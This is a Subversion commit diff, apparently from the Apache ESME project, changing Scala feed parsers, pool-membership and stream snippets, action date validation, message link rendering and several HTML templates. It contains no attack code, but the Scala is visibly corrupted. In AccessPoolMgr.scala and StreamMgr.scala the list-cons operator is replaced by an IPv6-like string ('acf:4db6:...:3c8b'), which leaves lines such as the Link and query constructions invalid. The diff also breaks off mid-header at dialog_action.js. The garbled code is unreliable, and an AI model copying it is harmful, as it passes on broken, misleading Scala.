incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/AtomFeed.scala Sun Oct 10 12:36:21 2010 @@ -37,7 +37,7 @@ class AtomFeed(user: User, atomURL: Stri override def dateFormats = AtomFeed.dateFormats - override def getEntries(xml: Elem) = xml \ "entry" + override def getEntries(xml: NodeSeq) = xml \ "entry" override def getText(node: Node) = { // a title element is mandatory Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/Feed.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/Feed.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/Feed.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/Feed.scala Sun Oct 10 12:36:21 2010 @@ -43,24 +43,22 @@ abstract class Feed(val user: User, val override def apply() = { - ( for { - xml <- PCDataXmlParser(responseString).toList - node <- xml.flatMap{ case e: Elem => List(e) case _ => Nil} - } - yield UserCreatedMessage( - if (user != null) {user.id} else 0, - getText(node) + " " + getLink(node), - tags, - getDate(node), - Empty, - source, - Empty, - None - ) - ).toList + for { + xml <- PCDataXmlParser(responseString).toList + node <- getEntries(xml) + } yield UserCreatedMessage( + if (user != null) {user.id} else 0, + getText(node) + " " + getLink(node), + tags, + getDate(node), + Empty, + source, + Empty, + None + ) } - protected def getEntries(xml: Elem): NodeSeq + protected def getEntries(xml: NodeSeq): NodeSeq protected def getText(xml: Node): String Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/RssFeed.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/RssFeed.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/RssFeed.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/RssFeed.scala Sun Oct 10 12:36:21 2010 @@ -38,7 +38,7 @@ class RssFeed(user: User, rssURL: String override def dateFormats = RssFeed.dateFormats - override def getEntries(xml: Elem) = xml \\ "item" + override def getEntries(xml: NodeSeq) = xml \\ "item" override def getText(node: Node) = { // if there's no title, get description Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/lib/AccessPoolMgr.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/lib/AccessPoolMgr.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/lib/AccessPoolMgr.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/lib/AccessPoolMgr.scala Sun Oct 10 12:36:21 2010 @@ -56,11 +56,12 @@ object AccessPoolMgr { val ifIsLoggedIn = If(loggedIn_? _, strFuncToFailMsg(() => S.?("base_error_not_logged_in"))) val menuItems = - Menu(Loc("accessPools", List("pools_view", "index"), S.?("base_pool_menu"), ifIsLoggedIn, + Menu(Loc("accessPools", new Link("pools_view" acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b Nil, true)/*List("pools_view", "index")*/, S.?("base_pool_menu"), ifIsLoggedIn, Loc.Snippet("addPool", addPool), Loc.Snippet("editPool", editPool), Loc.Snippet("poolUsers", displayPoolUsers), Loc.Snippet("poolDetail", displayPoolDetail)//regist snippet for pool detail display + ,Loc.Snippet("myPools", myPoolsWithRoles) )) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b Nil @@ -68,8 +69,9 @@ object AccessPoolMgr { //update pool detail response object updatePoolDetail extends RequestVar[() => JsCmd](() => Noop) - - + + object poolsWithRoles extends RequestVar[() => JsCmd](() => Noop) + object poolId extends RequestVar[Long](0) @@ -78,12 +80,15 @@ object AccessPoolMgr { * */ def addPool(in: NodeSeq): NodeSeq = { + + // redisplay my pools and roles + val redisplayPoolsAndRoles = poolsWithRoles.is val theInput = "new_pool" val newPoolDescription = "new_pool_description"; val user = User.currentUser var newPoolName = ""; - + //def addNewPool(name: String) = { def addNewPool(poolDescription: String) = { @@ -118,6 +123,7 @@ object AccessPoolMgr { SetValById(theInput, "") & ReplaceOptions("edit_pool", selectPools, Full(p.id.is.toString)) & FireOnchangeById("edit_pool") & + redisplayPoolsAndRoles() & //DisplayMessage("messages", <b>{S.?("base_pool_msg_new_pool",name)}</b>, 3 seconds, 2 seconds) DisplayMessage("messages", <b>{S.?("base_pool_msg_new_pool",x)}</b>, 3 seconds, 2 seconds) } else @@ -154,10 +160,13 @@ object AccessPoolMgr { // redisplay pool detail val redisplayPoolDetail = updatePoolDetail.is + val redisplayPoolsAndRoles = poolsWithRoles.is + // redisplay pool users and pool detail def redisplay(): JsCmd = { - redisplayPoolDetail() & redisplayPool() + redisplayPoolDetail() & redisplayPool() & redisplayPoolsAndRoles() } + var pool = "" var username = "" val editPoolName = "edit_pool" @@ -214,7 +223,8 @@ object AccessPoolMgr { case _ => DisplayMessage("messages", <b>{S.?("base_error_general")}</b>, 3 seconds, 2 seconds)//S.error(S.?("base_error_general")) } ) & //we needn't redisplay pool detail when add a new user - redisplayPool() & SetValById(editUsername, "") + redisplayPool() & SetValById(editUsername, "") & + redisplayPoolsAndRoles() } /* @@ -254,6 +264,39 @@ object AccessPoolMgr { ) } + def myPoolsWithRoles(in: NodeSeq): NodeSeq = { + + // get the span name to update + val spanName = S.attr("the_id") openOr "pool_membership_and_roles" + + def doRender(): NodeSeq = { + + val user = User.currentUser + + val userPools = + (user match { + case Full(u)=> Privilege.findViewablePools(u.id).map( + p => (p, AccessPool.find(p).get.getName)) + case _ => Nil + }) + + val userPerms = userPools.map((x: (Long, String)) => Privilege.getPermissionString(user.open_!.id, x._1)); + val poolsAndRoles = userPools.map(_._2).zip(userPerms) + + bind("myPool", in, + "pool" -> + (in1 => + poolsAndRoles.flatMap((x: (String, String)) => + bind("pool", in1, + "poolName" -> x._1, + "role" -> x._2 + )))) + } + + def updateSpan(): JsCmd = SetHtml(spanName, doRender()) + poolsWithRoles.set(updateSpan) + doRender + } def displayPoolDetail(in: NodeSeq): NodeSeq = { import org.apache.esme.model.AccessPool Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/lib/StreamMgr.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/lib/StreamMgr.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/lib/StreamMgr.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/lib/StreamMgr.scala Sun Oct 10 12:36:21 2010 @@ -64,75 +64,80 @@ object StreamMgr { object resenderId extends RequestVar[Long](AnyResender) object filterResent_? extends RequestVar[Boolean](false) object poolId extends RequestVar[Long](PublicPool) - object filterPools_? extends RequestVar[Boolean](false) - - def displayStream(in: NodeSeq): NodeSeq = { - // get the span name to update - val spanName = S.attr("the_id") openOr "StreamSpan" + object filterPools_? extends RequestVar[Boolean](false) + object spanName extends RequestVar[String]("StreamSpan") + object displayStreamNodes extends RequestVar[NodeSeq](Text("")) + + def updateSpan(): JsCmd = SetHtml(spanName, doRender(displayStreamNodes)) + + // bind the dynamic content to the incoming nodeseq + def doRender(in: NodeSeq): NodeSeq = { // get the current user val user = User.currentUser - - // bind the dynamic content to the incoming nodeseq - def doRender(): NodeSeq = { - val resentQuery = - if (filterResent_?.is == false) Nil - else { - val queryParam = resenderId.is match { - case AnyResender => NotBy(Mailbox.resentBy, Empty) - case id => By(Mailbox.resentBy, id) - } - List(In(Message.id,Mailbox.message,By(Mailbox.user, user), queryParam)) + + val resentQuery = + if (filterResent_?.is == false) Nil + else { + val queryParam = resenderId.is match { + case AnyResender => NotBy(Mailbox.resentBy, Empty) + case id => By(Mailbox.resentBy, id) } - - val poolsQuery = - if (filterPools_?.is == false) Nil - else List(poolId.is match { - case PublicPool => By(Message.pool, Empty) - case id => By(Message.pool, id) - }) - - val query = poolsQuery acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b: - resentQuery acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b: - List[QueryParam[Message]](OrderBy(Message.id, Descending), MaxRows(10)) + List(In(Message.id,Mailbox.message,By(Mailbox.user, user), queryParam)) + } + + val poolsQuery = + if (filterPools_?.is == false) Nil + else List(poolId.is match { + case PublicPool => By(Message.pool, Empty) + case id => By(Message.pool, id) + }) + + val query = poolsQuery acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b: + resentQuery acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b: + List[QueryParam[Message]](OrderBy(Message.id, Descending), MaxRows(10)) + + def profileImage(u: User): NodeSeq = { + var imageUrl = u.imageUrl.toString + if (imageUrl.length > 0) + <img width="30px" src={imageUrl}/> + else + <img width="30px" src="/images/avatar.jpg"/> + } - def profileImage(u: User): NodeSeq = { - var imageUrl = u.imageUrl.toString - if (imageUrl.length > 0) - <img width="30px" src={imageUrl}/> - else - <img width="30px" src="/images/avatar.jpg"/> - } - - //XXX copy from lib.UserMgr - def nicknameWithProfileLink(u: User): NodeSeq = { - <a href={"/user/" + urlEncode(u.nickname.is)}>{u.niceName}</a> - } - - val dateFormatter = new SimpleDateFormat("yyyy/MM/dd HH:mm") - + //XXX copy from lib.UserMgr + def nicknameWithProfileLink(u: User): NodeSeq = { + <a href={"/user/" + urlEncode(u.nickname.is)}>{u.niceName}</a> + } + + val dateFormatter = new SimpleDateFormat("yyyy/MM/dd HH:mm") - Message.findAll(query: _*) match { - case Nil => NodeSeq.Empty - case xs => bind("disp", in, - "item" -> - (lst => xs.flatMap(i => bind("item", lst, - "author" -> i.author.obj.map(nicknameWithProfileLink).openOr(Text("")), - "imageUrl" -> i.author.obj.map(profileImage).openOr(Text("")), - "text" -> i.getBody, - "date" -> dateFormatter.format(i.getWhen) - )))) - } + + Message.findAll(query: _*) match { + case Nil => NodeSeq.Empty + case xs => bind("disp", in, + "item" -> + (lst => xs.flatMap(i => bind("item", lst, + "author" -> i.author.obj.map(nicknameWithProfileLink).openOr(Text("")), + "imageUrl" -> i.author.obj.map(profileImage).openOr(Text("")), + "text" -> i.getBody, + "date" -> dateFormatter.format(i.getWhen) + )))) } - def updateSpan(): JsCmd = SetHtml(spanName, doRender()) + } + - updateStream.set(updateSpan) - doRender() + def displayStream(in: NodeSeq): NodeSeq = { + + updateStream.set(updateSpan) + displayStreamNodes.set(in) + + doRender(in) } - def streamFilters(in: NodeSeq): NodeSeq = { + def streamFilters(in: NodeSeq): NodeSeq = { + import org.apache.esme.model.AccessPool - import net.liftweb.common.Empty - val redisplayStream = updateStream.is + import net.liftweb.common.Empty val resenderInput = "resender_input" val poolInput = "pool_input" val filterResentInput = "filter_resent_input" @@ -162,7 +167,7 @@ object StreamMgr { poolId.set(pool) filterResent_?.set(filterResent) filterPools_?.set(filterPools) - redisplayStream() + updateStream() } /* @@ -212,5 +217,4 @@ object StreamMgr { "id" -> filterPoolsInput) ) } - } Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/liftwebext/SHtml.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/liftwebext/SHtml.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/liftwebext/SHtml.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/liftwebext/SHtml.scala Sun Oct 10 12:36:21 2010 @@ -1,4 +1,23 @@ -package org.apache.esme.liftwebext +/** + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + + package org.apache.esme.liftwebext import _root_.net.liftweb._ import http._ @@ -13,13 +32,6 @@ import JE._ import JsCmds._ import _root_.scala.xml._ -/** - * Created by IntelliJ IDEA. - * User: imtiaz - * Date: Jun 27, 2010 - * Time: 11:40:19 AM - * To change this template use File | Settings | File Templates. - */ object SHtml { import net.liftweb.http.js.JsCmds.JsCrVar Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/AccessPool.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/AccessPool.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/AccessPool.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/AccessPool.scala Sun Oct 10 12:36:21 2010 @@ -43,6 +43,13 @@ object AccessPool extends AccessPool wit ap.creator(User.currentUser) ap } + + def getPoolName(poolId: long) = { + AccessPool.find(poolId) match { + case Full(p) => p.getName + case _ => "ERROR" + } + } } class AccessPool extends LongKeyedMapper[AccessPool] { Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Action.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Action.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Action.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Action.scala Sun Oct 10 12:36:21 2010 @@ -265,6 +265,7 @@ class Action extends LongKeyedMapper[Act def testFunc = (testExpr(is): @unchecked) match { case Success(v, _) => Action.toFunc(v) } + } object uniqueId extends MappedUniqueId(this, 32) { @@ -280,7 +281,14 @@ class Action extends LongKeyedMapper[Act def setTest(in: String): Box[Action] = try { testExpr(in) match { - case Success(v, _) => Full(this.theTest(v.toStr)) + case Success(testAction: TestAction, _) => + testAction.error match { + case Some(msg) => + net.liftweb.common.Failure(msg + " - " + testAction.toStr, Empty, Empty) + case None => + Full(this.theTest(testAction.toStr)) + } + //case Success(v, _) => Full(this.theTest(v.toStr)) case Failure(m, _) => net.liftweb.common.Failure(m, Empty, Empty) case Error(m, _) => net.liftweb.common.Failure(m, Empty, Empty) } @@ -318,7 +326,7 @@ class Action extends LongKeyedMapper[Act test={theTest.is} action={theAction.is} enabled={enabled.toString}></action> - + } class PerformMatcher(val func: Action.TestFunc, val performId: Long, @@ -351,6 +359,7 @@ object TestAction { } sealed trait TestAction { + var error: Option[String] = None def toStr: String def toDisplayStr: String = toStr } @@ -362,13 +371,16 @@ case object SentToMeAction extends TestA } case class NotAction(action: TestAction) extends TestAction { def toStr = "not( "+action.toStr+" )" + override def toDisplayStr = "not( "+action.toDisplayStr+" )" } case class OrAction(left: TestAction, right: TestAction) extends TestAction { def toStr = left.toStr + " | " + right.toStr + override def toDisplayStr = left.toDisplayStr + " | " + right.toDisplayStr } case class AndAction(left: TestAction, right: TestAction) extends TestAction { def toStr = left.toStr + " & " + right.toStr + override def toDisplayStr = left.toDisplayStr + " & " + right.toDisplayStr } case class AtUserAction(userId: Long) extends TestAction { @@ -386,6 +398,7 @@ case object PoolAction extends TestActio case class PoolAction(poolId: Long) extends TestAction { def toStr = "pool:" + poolId + override def toDisplayStr = "pool:" + AccessPool.getPoolName(poolId) } case object ResentAction extends TestAction { @@ -439,6 +452,7 @@ case class HashAction(hashId: Long, str: case class ParenAction(action: TestAction) extends TestAction { def toStr = "( "+action.toStr+" )" + override def toDisplayStr = "( "+action.toDisplayStr+" )" } case class PercentAction(percent: Int) extends TestAction { @@ -484,6 +498,15 @@ case class DateTestAction(dateType: Date case xs => xs.mkString("(", ", ", ")") } ) + + error = + dateType match { + case DayDateType => if (what.exists((x) => x < 1 || x > 7)) Some("Invalid day value") else None + case DateDateType => if (what.exists((x) => x < 1 || x > 31)) Some("Invalid date value") else None + case MonthDateType => if (what.exists((x) => x < 1 || x > 11)) Some("Invalid month value") else None + case HourDateType => if (what.exists((x) => x < 0 || x > 23)) Some("Invalid hour value") else None + case MinuteDateType => if (what.exists((x) => x < 0 || x > 59)) Some("Invalid minute value") else None + } } sealed trait OprType { Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Message.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Message.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Message.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Message.scala Sun Oct 10 12:36:21 2010 @@ -202,7 +202,8 @@ object Message extends Message with Long Privilege.findViewablePools(user.id.is) } val newQueryParams: Seq[QueryParam[Message]] = viewablePools match { - case Full(pools: List[Long]) if !pools.isEmpty => List( + case Full(Nil) => List(By(pool, Empty)) + case Full(pools: List[Long]) => List( BySql(" POOL in ( ?" + ( ", ?" * (pools.size - 1)) + " ) OR POOL IS NULL ", IHaveValidatedThisSQL("vdichev", "22 June 2009"), pools.toSeq:_*) @@ -311,7 +312,8 @@ class Message extends LongKeyedMapper[Me lazy val body: String = originalXml \ "body" text - lazy val metadata: String = originalXml \ "metadata" text + //lazy val metadata: String = originalXml \ "metadata" text + lazy val metadata: String = (originalXml \ "metadata").toString lazy val metaData: String = { val org = originalXml @@ -392,9 +394,16 @@ class Message extends LongKeyedMapper[Me case e: Elem if e.label == "url" => e.attribute("url").flatMap(url => - e.attribute("uniqueId").map(id => - <xml:group> <a href={"/u/"+id} target="_blank">{url}</a> </xml:group>)). - getOrElse(Text("") ) + e.attribute("uniqueId").map { id => + val href = + if (pool.defined_?) + // disable shortener to avoid popularity statistics + url.toString + else + "/u/" + id + <xml:group> <a class="tiplelement" href={href} target="_blank" title={url}>{url.toString.substring(0,20)}...</a> </xml:group> + } + ).getOrElse(Text("") ) case e: Elem if e.label == "em" => e.attribute("text").map(text => @@ -498,8 +507,9 @@ class Message extends LongKeyedMapper[Me * Note that the text representation of the XML must be readable * for clients that don't support markup formatting * and is recommended to result in the same XML when parsed - */ - def setTextAndTags(in: String, tags: List[Tag], metaData: Box[Elem]): Box[Message] = { + */ + + def setTextAndTags(in: String, tags: List[Tag], metaData: Box[Node]): Box[Message] = { MsgParser.parseMessage(in).map{ lst => val xml = <message><body>{ Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Privilege.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Privilege.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Privilege.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Privilege.scala Sun Oct 10 12:36:21 2010 @@ -71,6 +71,11 @@ object Privilege extends Privilege with By(Privilege.user, userId), By(Privilege.permission, Permission.Admin) )(p => Full(p.pool.is)) :_*) + + def getPermissionString(userId: Long, poolId: Long) : String = Privilege.find( + By(user, userId), + By(pool, poolId) + ).map(_.permission.is).open_!.toString } /** @@ -98,6 +103,7 @@ class Privilege extends LongKeyedMapper[ By(user, userId), By(pool, poolId) ).map(_.permission.is >= permission).getOrElse(false) + } /** Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/index.html URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/index.html?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/index.html (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/index.html Sun Oct 10 12:36:21 2010 @@ -56,20 +56,19 @@ <lift:comet type="SinglePublicTimeline"/> <!--updates-box --> - <div class="gray-box"> - <h1>Now on ESME</h1> - <div class = "mesg-box"> - <div id="timeline_messages"> - <div id="message"> - - <div class="avatar"> <img id="avatar" src="/images/avatar.jpg" alt="Anonymous" width="50px"/></div> - <div class="update"> <div id="body">-</div> - <div class="info"><a id="author">-</a><div class="time"></div></div> - </div> - <div class="time"> <div id="supp_data"> -</div> </div> - </div> - </div> - </div> + <h1><lift:loc>ui_default_on_esme</lift:loc></h1> + <div id="timeline_messages" class="gray-box"> + <div class="updates-box" id="message" style =""> + <div class="avatar"> + <img id="avatar" width="40px" /> + </div> + <!--end avatar--> + <div class="info2"> + <a href="" id="author" /> + <div id="msgbody" /> + <div class="supp_data_class" id="supp_data" /> + </div> + </div> </div><!--gray-box--> </lift:surround> </logged:out> Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/public.html URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/public.html?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/public.html (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/public.html Sun Oct 10 12:36:21 2010 @@ -18,16 +18,14 @@ --> <lift:surround with="base" at="left"> - <div id="left"> <div id="back-header"> + <div id="left"> <h1><lift:loc>ui_public_title</lift:loc></h1> -<div class="container-aux"> + <div class="container-public"> <!--updates-box --> <lift:comet type="PublicTimeline"/> <lift:embed what="templates-hidden/message_core"/> </div> - <!--updates-box--> - - </div><!-- End demo --> + </div> </div><!-- End demo --> </lift:surround> \ No newline at end of file Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/search.html URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/search.html?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/search.html (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/search.html Sun Oct 10 12:36:21 2010 @@ -17,20 +17,22 @@ under the License. * --> <lift:surround with="base" at="left"> -<script src="../scripts/display_messages.js" type="text/javascript"/> - <div id="left"> - <div id="back-header"> - <h1><lift:loc>ui_messages_search_for</lift:loc> <i><lift:searchTerm/></i> </h1> -<div class="container-aux"> - <!--updates-box --> - <lift:displaySearch/> - <lift:embed what="templates-hidden/message_core"/> - </div> - <!--updates-box--> - - </div><!-- End demo --> -</div><!-- End demo --> - - + <div id="back-header"> + <div id="left"> + <h1> + <lift:loc>ui_messages_search_for</lift:loc> + <i> + <lift:searchTerm/> + </i> + </h1> + <div class="container-public"> + <!--updates-box --> + <lift:displaySearch/> + <lift:embed what="templates-hidden/message_core"/> + </div> + <!--updates-box--> + </div> + <!-- End demo --> + </div> </lift:surround> Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/streams.html URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/streams.html?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/streams.html (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/streams.html Sun Oct 10 12:36:21 2010 @@ -16,64 +16,64 @@ specific language governing permissions and limitations * under the License. * --> -<lift:surround with="base" at="left"> +<lift:surround with="base" at="left"> + <link rel="stylesheet" type="text/css" href="../style/style.css"/> <lift:TableSorterSnip/> <div id="back-header"> - <h1><b><lift:loc>ui_streams_manage</lift:loc></b></h1> - </div> - - <!---CONTENT BOX--> - <div class="container-streams"> - <div class="StreamUI"> - <lift:streamFilters> - <table class="tablesorter" > - <thead> - <tr> - <th class="tipelement" title="These are users that you follow"> - <lift:loc>ui_streams_filter_resender</lift:loc> <main:resent/> - </th> - <th align="center" class="tipelement" title="Filter by messages that have been resent by those you follow. "> - <lift:loc>ui_streams_resent_active</lift:loc> <main:filterResent/> - </th> - <th class="tipelement" title="These are pools in which you are a member"> - <lift:loc>ui_streams_filter_pool</lift:loc> <main:pools/> - </th> - <th align="center"> - <lift:loc>ui_streams_pool_active</lift:loc> <main:filterPools/> - </th> - </tr> - </thead> - </table> - </lift:streamFilters> - </div> - - <div class ="stream_body"> - <table id="esme-table" class="tablesorter"> - <thead> + <h1><b><lift:loc>ui_streams_manage</lift:loc></b></h1> + + <!---CONTENT BOX--> + <div class="container-streams"> + <div class="StreamUI"> + <lift:streamFilters> + <table class="tablesorter" > + <thead> + <tr> + <th class="tipelement" title="These are users that you follow"> + <lift:loc>ui_streams_filter_resender</lift:loc> <main:resent/> + </th> + <th align="center" class="tipelement" title="Filter by messages that have been resent by those you follow. "> + <lift:loc>ui_streams_resent_active</lift:loc> <main:filterResent/> + </th> + <th class="tipelement" title="These are pools in which you are a member"> + <lift:loc>ui_streams_filter_pool</lift:loc> <main:pools/> + </th> + <th align="center"> + <lift:loc>ui_streams_pool_active</lift:loc> <main:filterPools/> + </th> + </tr> + </thead> + </table> + </lift:streamFilters> + </div> + <div class ="stream_body"> + <table id="esme-table" class="tablesorter"> + <thead> <tr> - <th></th> - <th><lift:loc>ui_user_list_nickname</lift:loc></th> - <th><lift:loc>ui_user_list_last_message</lift:loc></th> - <th><lift:loc>ui_user_list_last_message_date</lift:loc></th> + <th></th> + <th><lift:loc>ui_user_list_nickname</lift:loc></th> + <th><lift:loc>ui_user_list_last_message</lift:loc></th> + <th><lift:loc>ui_user_list_last_message_date</lift:loc></th> </tr> - </thead> - <tbody id="StreamSpan"> - <lift:displayStream> - <disp:item> - <tr class="user_row"> - <td><item:imageUrl/></td> - <td> - <div class="user_name"> - <item:author/> - </div> - </td> - <td class="user_message"><item:text/></td> - <td><item:date/></td> - </tr> - </disp:item> - </lift:displayStream> - </tbody> - </table> - </div> - </div> + </thead> + <tbody id="StreamSpan"> + <lift:displayStream> + <disp:item> + <tr class="user_row"> + <td><item:imageUrl/></td> + <td> + <div class="user_name"> + <item:author/> + </div> + </td> + <td class="user_message"><item:text/></td> + <td><item:date/></td> + </tr> + </disp:item> + </lift:displayStream> + </tbody> + </table> + </div> + </div> + </div> </lift:surround> \ No newline at end of file Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/pools_view/index.html URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/pools_view/index.html?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/pools_view/index.html (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/pools_view/index.html Sun Oct 10 12:36:21 2010 @@ -92,8 +92,7 @@ </fieldset> </lift:poolDetail> </div> - <div id="PoolSpan"> - + <div id="PoolSpan"> <lift:ignore> <!-- The poolUsers snippet *MUST* appear on the page before the editPool snippet --> </lift:ignore> @@ -125,7 +124,7 @@ </table> <div class="post-form-row"> <div class="submit-btn tipelement" title="Add a user to an existing pool." > - <input type="image" onclick="javascript:$('#dialog-form-user').dialog('open')" id="create-user" src="../images/add1.gif"/> + <input type="image" onclick="javascript:$('#dialog-form-user').dialog('open')" id="create-user" src="../images/edit.gif"/> </div> </div> </lift:poolUsers> @@ -137,7 +136,39 @@ <edit:pool class="tipelement" title="Select a pool to edit"/> </lift:editPool> </lift:form> - </div> + </div> + <div id="pool_membership_and_roles" title="My Pool Roles" > + <lift:myPools the_id="pool_membership_and_roles"> + <br/> + <br/> + <br/> + <b><lift:loc>ui_pool_list_mine_title</lift:loc></b> + <table id="esme-table" class="tablesorter"> + <thead> + <tr> + <th> + <lift:loc>ui_pool_list_mine_pool_name</lift:loc> + </th> + <th> + <lift:loc>ui_pool_list_mine_role</lift:loc> + </th> + </tr> + </thead> + <tbody> + <myPool:pool> + <tr> + <td> + <pool:poolName/> + </td> + <td> + <pool:role/> + </td> + </tr> + </myPool:pool> + </tbody> + </table> + </lift:myPools> + </div> <div id="dialog-form" title="Create new pool" style="display: none"> <p class="validateTips"> <!--lift:loc>ui_form_all_fields_required</lift:loc--> @@ -158,7 +189,7 @@ </lift:addPool> </form> </div> - <div id="dialog-form-user" title="Add a user to a pool" style="display: none"> + <div id="dialog-form-user" title="Add a user/Change a user's role" style="display: none"> <p class="validateTips"> <lift:loc>ui_form_all_fields_required</lift:loc> </p> @@ -168,11 +199,13 @@ <label for="poolName"> <lift:loc>ui_pool_add</lift:loc> </label> - <edit:username class="text ui-widget-content ui-corner-all tipelement" title="This is the user that will be added to a pool." /> + <!--edit:username class="text ui-widget-content ui-corner-all tipelement" title="This is the user that will be added to a pool." /--> + <edit:username class="text ui-widget-content ui-corner-all tipelement" title="This will be the new user or the user whose role is being changed" /> <label for="permission"> <lift:loc>ui_pool_list_user_role</lift:loc> </label> - <edit:permission class="text ui-widget-content ui-corner-all tipelement" title="This is the type of permission that the new user will have." /> + <!--edit:permission class="text ui-widget-content ui-corner-all tipelement" title="This is the type of permission that the new user will have." /--> + <edit:permission class="text ui-widget-content ui-corner-all tipelement" title="This is the type of permission that the user will have." /> </fieldset> </lift:editPool> </form> Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_action.js URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_action.js?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- 